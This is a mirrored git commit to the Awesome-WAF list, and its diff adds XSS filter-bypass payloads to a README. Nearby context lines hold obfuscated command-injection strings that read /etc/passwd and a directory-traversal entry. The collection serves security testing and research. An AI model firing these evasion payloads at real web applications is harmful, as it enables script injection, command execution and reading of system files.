mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 16:53:27 +07:00
Updated some bypasses for some WAFs
This commit is contained in:
parent
179eda145d
commit
84280f3751
10
README.md
10
README.md
@ -2977,6 +2977,10 @@ xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||
```
|
||||
<--`<img/src=` onerror=confirm``> --!>
|
||||
```
|
||||
- [XSS Bypass](https://twitter.com/le4rner/status/1146453980400082945) by [@Shiva Krishna](https://twitter.com/le4rner)
|
||||
```
|
||||
javascript:{alert`0`}
|
||||
```
|
||||
- [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
|
||||
```
|
||||
cat$u+/etc$u/passwd$u
|
||||
@ -3294,7 +3298,7 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
|
||||
```
|
||||
|
||||
### Sucuri
|
||||
- [Smuggling RCE Payloads through Sucuri](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
|
||||
- [Smuggling RCE Payloads](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
|
||||
```
|
||||
/???/??t+/???/??ss??
|
||||
```
|
||||
@ -3303,6 +3307,10 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
|
||||
;+cat+/e'tc/pass'wd
|
||||
c\\a\\t+/et\\c/pas\\swd
|
||||
```
|
||||
- [XSS Bypass](https://twitter.com/return_0x/status/1148605627180208129) by [@Luka](https://twitter.com/return_0x)
|
||||
```
|
||||
"><input/onauxclick="[1].map(prompt)">
|
||||
```
|
||||
|
||||
### URLScan
|
||||
- [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET)
|
||||
|
Loading…
Reference in New Issue
Block a user